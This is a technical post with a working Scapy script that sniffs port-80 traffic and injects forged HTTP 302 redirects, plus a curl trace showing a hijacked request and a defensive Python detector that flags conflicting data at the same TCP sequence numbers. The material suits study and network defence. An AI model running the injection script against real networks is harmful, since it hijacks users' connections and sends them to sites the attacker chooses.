TCP injection attack (HTTP redirection) using Scapy
```text
$ sudo python tcp_http_spoof.py >&/dev/null &
[1] 3477
$ curl -vL http://www.google.com/
* Hostname was NOT found in DNS cache
*   Trying 172.217.26.100...
* Connected to www.google.com (172.217.26.100) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: www.google.com
> Accept: */*
>
< HTTP/1.1 302 Found
< Location: http://www.example.com/
< Content-Length: 0
< Connection: close
<
* Closing connection 0
* Issue another request to this URL: 'http://www.example.com/'
* Hostname was NOT found in DNS cache
*   Trying 93.184.216.34...
* Connected to www.example.com (93.184.216.34) port 80 (#1)
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: www.example.com
> Accept: */*
>
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Cache-Control: max-age=604800
< Content-Type: text/html
< Date: Mon, 08 Aug 2016 16:28:39 GMT
< Etag: "359670651+gzip"
< Expires: Mon, 15 Aug 2016 16:28:39 GMT
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
* Server ECS (cpm/F9D5) is not blacklisted
< Server: ECS (cpm/F9D5)
< Vary: Accept-Encoding
< X-Cache: HIT
< x-ec-custom-error: 1
< Content-Length: 1270
<
<!doctype html>
(snip)
* Connection #1 to host www.example.com left intact
```
```python
from scapy.all import *


class TCP_HTTP_am(AnsweringMachine):
    # scapy AnsweringMachine: sniff with `filter`, and for every packet where
    # is_request() is true, send whatever make_reply() returns
    function_name = "TCP_HTTP_spoof"
    filter = "tcp port 80"

    def parse_options(self, target_host="www.google.com", redirect_url='http://www.example.com/'):
        self.target_host = target_host
        self.redirect_url = redirect_url

    def is_request(self, req):
        # only segments with a payload whose Host header names the target
        # (Raw.load is a str under the Python 2 scapy this script was written
        # against; on Python 3 it is bytes and this comparison needs b"...")
        return req.haslayer(Raw) and ("Host: %s" % self.target_host in req.getlayer(Raw).load)

    def make_reply(self, req):
        ip = req.getlayer(IP)
        tcp = req.getlayer(TCP)
        http_payload = ("HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\n"
                        "Connection: close\r\n\r\n" % self.redirect_url)
        # mirror the sniffed request's addresses and ports; seq is the client's
        # ack and ack is the client's seq advanced past its payload, so the
        # forged segment lands inside the client's receive window
        resp = (IP(dst=ip.src, src=ip.dst)
                / TCP(dport=tcp.sport, sport=tcp.dport, flags="PA",
                      seq=tcp.ack, ack=tcp.seq + len(tcp.payload))
                / Raw(load=http_payload))
        return resp


if __name__ == '__main__':
    # send replies through a raw layer-3 socket (needed on Linux, hence sudo)
    conf.L3socket = L3RawSocket
    TCP_HTTP_am()()
```
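A defender-side check, added here as an example and not part of this gist or of scapy: the forged 302 above only works because it races the genuine reply, so a passive sensor on the path sees two server-to-client segments claiming the same sequence numbers but carrying different bytes, and usually with a different IP TTL, because the injector sits closer to the client than the real server does. The detector below is pure Python with constructed sample segments (the server address is the one from the curl trace; the client address, ports and sequence numbers are made up). Per flow it remembers the first byte seen at each absolute sequence number and flags any later segment that disagrees, plus any TTL change on the same flow; a plain retransmission with identical bytes raises nothing.

```python
"""Spot TCP payload injection from conflicting data at the same sequence
numbers (example code; the sample segments are constructed, not captured)."""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass
class Segment:
    """Minimal view of one TCP segment as a passive sensor would decode it."""
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ttl: int
    payload: bytes


FlowKey = Tuple[str, int, str, int]          # (src, sport, dst, dport)
Alert = Tuple[str, FlowKey, int]             # (kind, flow, detail)


@dataclass
class FlowState:
    # absolute seq -> first byte value seen there (a toy store; a real engine
    # would keep a reassembly buffer or interval tree instead of a dict)
    seen: Dict[int, int] = field(default_factory=dict)
    ttls: Set[int] = field(default_factory=set)


class InjectionDetector:
    def __init__(self) -> None:
        self.flows: Dict[FlowKey, FlowState] = {}

    def observe(self, seg: Segment) -> List[Alert]:
        """Record one segment; return alerts for conflicting data or TTL drift."""
        key: FlowKey = (seg.src, seg.sport, seg.dst, seg.dport)
        st = self.flows.setdefault(key, FlowState())
        alerts: List[Alert] = []

        conflicts: List[int] = []
        for off, byte in enumerate(seg.payload):
            s = (seg.seq + off) & 0xFFFFFFFF   # 32-bit sequence space wraps
            prev = st.seen.get(s)
            if prev is None:
                st.seen[s] = byte              # first sight of this byte: keep it
            elif prev != byte:
                conflicts.append(s)            # same seq, different content
        if conflicts:
            # detail = first conflicting sequence number
            alerts.append(("conflicting-data", key, conflicts[0]))

        # weaker signal: a forged segment from a nearer host rarely matches the
        # TTL the real server's packets arrive with (route changes also trip this)
        if st.ttls and seg.ttl not in st.ttls:
            alerts.append(("ttl-change", key, seg.ttl))
        st.ttls.add(seg.ttl)
        return alerts


# constructed sample traffic: server address from the curl trace, client made up
SERVER = ("172.217.26.100", 80)
CLIENT = ("10.0.0.5", 51234)
CLIENT2 = ("10.0.0.5", 51235)

INJECTED = (b"HTTP/1.1 302 Found\r\nLocation: http://www.example.com/\r\n"
            b"Content-Length: 0\r\nConnection: close\r\n\r\n")
GENUINE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
           b"Content-Length: 5\r\n\r\nhello")


def run_demo() -> Dict[str, List[Alert]]:
    det = InjectionDetector()

    # flow 1: forged reply wins the race (TTL of a nearby host), genuine reply
    # arrives afterwards with the same seq, different bytes and a farther TTL
    attacked: List[Alert] = []
    attacked += det.observe(Segment(*SERVER, *CLIENT, seq=1000, ttl=64, payload=INJECTED))
    attacked += det.observe(Segment(*SERVER, *CLIENT, seq=1000, ttl=57, payload=GENUINE))

    # flow 2: genuine reply, an identical retransmission, then the next segment
    clean: List[Alert] = []
    clean += det.observe(Segment(*SERVER, *CLIENT2, seq=5000, ttl=57, payload=GENUINE))
    clean += det.observe(Segment(*SERVER, *CLIENT2, seq=5000, ttl=57, payload=GENUINE))
    clean += det.observe(Segment(*SERVER, *CLIENT2, seq=5000 + len(GENUINE), ttl=57,
                                 payload=b"<!doctype html>"))

    return {"attacked": attacked, "clean": clean}


if __name__ == "__main__":
    for name, alerts in run_demo().items():
        print(name, alerts or "no alerts")
```

The first alert's detail is 1009: both replies start with `HTTP/1.1 `, so the first byte that disagrees is the status code. Only the server-to-client direction is tracked here, and the first-seen byte is kept whether or not it was the forged one, which is fine for alerting but means a verdict on which copy was genuine needs the TTL or other signals.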